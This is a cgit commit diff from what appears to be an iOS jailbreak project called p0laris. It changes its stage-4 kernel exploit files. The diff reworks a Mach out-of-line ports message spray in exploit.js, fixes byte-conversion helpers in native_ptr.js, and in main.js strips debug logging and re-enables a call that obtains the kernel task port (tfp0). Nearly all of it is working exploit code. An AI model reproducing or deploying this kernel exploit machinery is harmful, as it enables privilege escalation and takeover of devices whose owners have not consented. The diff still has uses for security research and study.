summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
Diffstat
-rwxr-xr-xsrc/stage4/kexp/exploit.js27
-rw-r--r--src/stage4/lib/native_ptr.js20
-rw-r--r--src/stage4/main.js132
3 files changed, 97 insertions, 82 deletions
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js
index e761184..68ed794 100755
--- a/src/stage4/kexp/exploit.js
+++ b/src/stage4/kexp/exploit.js
@@ -221,7 +221,7 @@ function spray_ports(number_port_descs) {
ret_ = send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
-// p0laris_log("sp %d (%s)\n", ret_, mach_error_string(ret_));
+ p0laris_log("sp %d (%s)\n", ret_, mach_error_string(ret_));
var ret = read_u32(mp);
shit_heap_free(mp);
@@ -250,6 +250,7 @@ function fast_array_mul(arr, n) {
}
function send_ports(target, payload, num, number_port_descs) {
+ if (0) {
var init_port_set = shit_heap(num * 4);
for (var i = 0; i < num; i++) {
@@ -281,8 +282,30 @@ function send_ports(target, payload, num, number_port_descs) {
large_buf[req_head_msgh_id >>> 2] = 1337;
// p0laris_log("%s\n", prim_hexdump(read_buf(large_buf_ptr, 0x100)));
+}
+
+ var init_port_set = new mach_port_t(num);
+
+ var InP = new Request_sp(number_port_descs);
+ var InP_obj = InP.deref();
+ InP_obj.msgh_body.msgh_descriptor_count = number_port_descs;
+
+ for (var i = 0; i < number_port_descs; i++) {
+ InP_obj.init_port_set[i].address = init_port_set.addy;
+ InP_obj.init_port_set[i].count = num;
+ InP_obj.init_port_set[i].disposition = 19;
+ InP_obj.init_port_set[i].deallocate = false;
+ InP_obj.init_port_set[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+ }
+
+ InP_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ InP_obj.Head.msgh_remote_port = target;
+ InP_obj.Head.msgh_local_port = 0;
+ InP_obj.Head.msgh_id = 1337;
+
+ InP.write(InP_obj);
- var ret = mach_msg(large_buf_ptr, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
+ var ret = mach_msg(InP.addy, 1, 0x1c + (number_port_descs * 0xc), 0, 0, 0, MACH_PORT_NULL);
return ret;
}
diff --git a/src/stage4/lib/native_ptr.js b/src/stage4/lib/native_ptr.js
index 464d865..3741e80 100644
--- a/src/stage4/lib/native_ptr.js
+++ b/src/stage4/lib/native_ptr.js
@@ -33,7 +33,6 @@ class native_ptr {
if (Object.getPrototypeOf(this).deref_all != undefined) {
this.size *= this.count;
- p0laris_log("get lucky %d", this.size);
}
if (this.addy === undefined) {
@@ -197,34 +196,27 @@ function mach_msg_header_t_obj_to_buf(obj) {
function mach_msg_body_t_buf_to_obj(buf) {
var ret = {};
- ret.msgh_descriptor_count = u32_to_u8x4(buf);
+ ret.msgh_descriptor_count = u8x4_to_u32(buf);
return ret;
}
function mach_msg_body_t_obj_to_buf(obj) {
- var ret = u8x4_to_u32(obj.msgh_descriptor_count);
+ var ret = u32_to_u8x4(obj.msgh_descriptor_count);
return ret;
}
function Request_sp_buf_to_obj(buf) {
var ret = {};
- p0laris_log("w00t %d %s", buf.length, Object.getOwnPropertyNames(Object.getPrototypeOf(buf)).toString());
var Head_buf = buf.subarray(0, 24);
- p0laris_log("w00t");
var msgh_body_buf = buf.subarray(24, 28);
- p0laris_log("w00t");
var init_port_set_buf = buf.subarray(28);
- p0laris_log("w00t");
ret.Head = mach_msg_header_t_buf_to_obj(Head_buf);
- p0laris_log("w00t");
ret.msgh_body = mach_msg_body_t_buf_to_obj(msgh_body_buf);
- p0laris_log("w00t");
ret.init_port_set = new Array();
for (var i = 0; i < (buf.length - 28) / 28; i++) {
- p0laris_log("%d", i);
var init_port_set_buf = buf.subarray((i * 28) + 28);
ret.init_port_set.push(mach_msg_ool_ports_descriptor_t_buf_to_obj(init_port_set_buf));
}
@@ -236,7 +228,6 @@ function Request_sp_obj_to_buf(obj) {
var ret = new Uint8Array(this.size * this.count);
var tmp = mach_msg_header_t_obj_to_buf(obj.Head);
var begin = 0;
- p0laris_log("w00t");
var i = 0;
begin = i;
@@ -245,7 +236,6 @@ function Request_sp_obj_to_buf(obj) {
ret[i] = tmp[i - begin];
}
- p0laris_log("w00t");
begin = i;
var tmp = mach_msg_body_t_obj_to_buf(obj.msgh_body);
@@ -254,7 +244,6 @@ function Request_sp_obj_to_buf(obj) {
ret[i] = tmp[i - begin];
}
- p0laris_log("w00t");
begin = i;
for (var i = 0; i < obj.init_port_set.length; i++) {
@@ -263,7 +252,6 @@ function Request_sp_obj_to_buf(obj) {
ret[begin + (i * 12) + j] = tmp[j];
}
}
- p0laris_log("w00t");
return ret;
}
@@ -279,4 +267,6 @@ var mach_msg_ool_ports_descriptor_t = native_ptr_type(12,
var Request_sp = native_ptr_type(24 + 4 + 12,
Request_sp_buf_to_obj,
Request_sp_obj_to_buf);
-Request_sp.prototype.deref_all = true; \ No newline at end of file
+Request_sp.prototype.deref_all = true;
+
+var mach_port_t = native_ptr_type(4); \ No newline at end of file
diff --git a/src/stage4/main.js b/src/stage4/main.js
index 541dc44..6d14de1 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -55,74 +55,76 @@ function main() {
sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
prep_shit();
- var init_port_set = new mach_msg_ool_ports_descriptor_t(4);
- var addy = init_port_set.addy;
- var init_port_set_obj = init_port_set.deref();
- init_port_set_obj.address = 0x41414141;
- init_port_set_obj.count = 0x42424242;
- init_port_set_obj.disposition = 19;
- init_port_set_obj.deallocate = false;
- init_port_set_obj.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
- init_port_set.write(init_port_set_obj, 0);
- init_port_set.write(init_port_set_obj, 1);
- init_port_set.write(init_port_set_obj, 2);
- init_port_set.write(init_port_set_obj, 3);
- p0laris_log("%s %s %s %s", JSON.stringify(init_port_set.deref(0)),
- JSON.stringify(init_port_set.deref(1)),
- JSON.stringify(init_port_set.deref(2)),
- JSON.stringify(init_port_set.deref(3)));
-
- var Head = new mach_msg_header_t();
- var addy = Head.addy;
- var Head_obj = Head.deref();
- Head_obj.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
- Head_obj.msgh_remote_port = 0x41424344;
- Head_obj.msgh_local_port = 0x45464748;
- Head_obj.msgh_id = 1337;
- Head.write(Head_obj);
- p0laris_log("%s", JSON.stringify(Head.deref()));
-
- p0laris_log("here");
-
- var req = new Request_sp(4);
- p0laris_log("here");
- var addy = req.addy;
- p0laris_log("here");
- var req_obj = req.deref();
- p0laris_log("here");
-
- req_obj.msgh_body.msgh_descriptor_count = 4;
- p0laris_log("here");
- for (var i = 0; i < 4; i++) {
- req_obj.init_port_set[i].address = 0x1234;
- req_obj.init_port_set[i].count = 0x1235;
- req_obj.init_port_set[i].disposition = 19;
- req_obj.init_port_set[i].deallocate = false;
- req_obj.init_port_set[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
- }
-
- p0laris_log("here");
- req_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
- p0laris_log("here");
- req_obj.Head.msgh_remote_port = 0x41424344;
- p0laris_log("here");
- req_obj.Head.msgh_local_port = 0x45464748;
- p0laris_log("here");
- req_obj.Head.msgh_id = 1337;
-
- p0laris_log("here");
- req.write(req_obj);
- p0laris_log("here");
- p0laris_log("%s", JSON.stringify(req.deref(), function (key, value) {
- if (typeof value === 'number') {
- return "0x" + value.toString(16);
+ if (0) {
+ var init_port_set = new mach_msg_ool_ports_descriptor_t(4);
+ var addy = init_port_set.addy;
+ var init_port_set_obj = init_port_set.deref();
+ init_port_set_obj.address = 0x41414141;
+ init_port_set_obj.count = 0x42424242;
+ init_port_set_obj.disposition = 19;
+ init_port_set_obj.deallocate = false;
+ init_port_set_obj.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+ init_port_set.write(init_port_set_obj, 0);
+ init_port_set.write(init_port_set_obj, 1);
+ init_port_set.write(init_port_set_obj, 2);
+ init_port_set.write(init_port_set_obj, 3);
+ p0laris_log("%s %s %s %s", JSON.stringify(init_port_set.deref(0)),
+ JSON.stringify(init_port_set.deref(1)),
+ JSON.stringify(init_port_set.deref(2)),
+ JSON.stringify(init_port_set.deref(3)));
+
+ var Head = new mach_msg_header_t();
+ var addy = Head.addy;
+ var Head_obj = Head.deref();
+ Head_obj.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ Head_obj.msgh_remote_port = 0x41424344;
+ Head_obj.msgh_local_port = 0x45464748;
+ Head_obj.msgh_id = 1337;
+ Head.write(Head_obj);
+ p0laris_log("%s", JSON.stringify(Head.deref()));
+
+ p0laris_log("here");
+
+ var req = new Request_sp(4);
+ p0laris_log("here");
+ var addy = req.addy;
+ p0laris_log("here");
+ var req_obj = req.deref();
+ p0laris_log("here");
+
+ req_obj.msgh_body.msgh_descriptor_count = 4;
+ p0laris_log("here");
+ for (var i = 0; i < 4; i++) {
+ req_obj.init_port_set[i].address = 0x1234;
+ req_obj.init_port_set[i].count = 0x1235;
+ req_obj.init_port_set[i].disposition = 19;
+ req_obj.init_port_set[i].deallocate = false;
+ req_obj.init_port_set[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
}
- return value;
- }, "\t"));
- p0laris_log("here");
+ p0laris_log("here");
+ req_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ p0laris_log("here");
+ req_obj.Head.msgh_remote_port = 0x41424344;
+ p0laris_log("here");
+ req_obj.Head.msgh_local_port = 0x45464748;
+ p0laris_log("here");
+ req_obj.Head.msgh_id = 1337;
+
+ p0laris_log("here");
+ req.write(req_obj);
+ p0laris_log("here");
+ p0laris_log("%s", JSON.stringify(req.deref(), function (key, value) {
+ if (typeof value === 'number') {
+ return "0x" + value.toString(16);
+ }
+
+ return value;
+ }, "\t"));
+ p0laris_log("here");
+ }
-// var tfp0 = get_kernel_task();
+ var tfp0 = get_kernel_task();
syslog(LOG_SYSLOG, "__p0laris_LOG_END__");
return 0;
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 19:16:38 +0000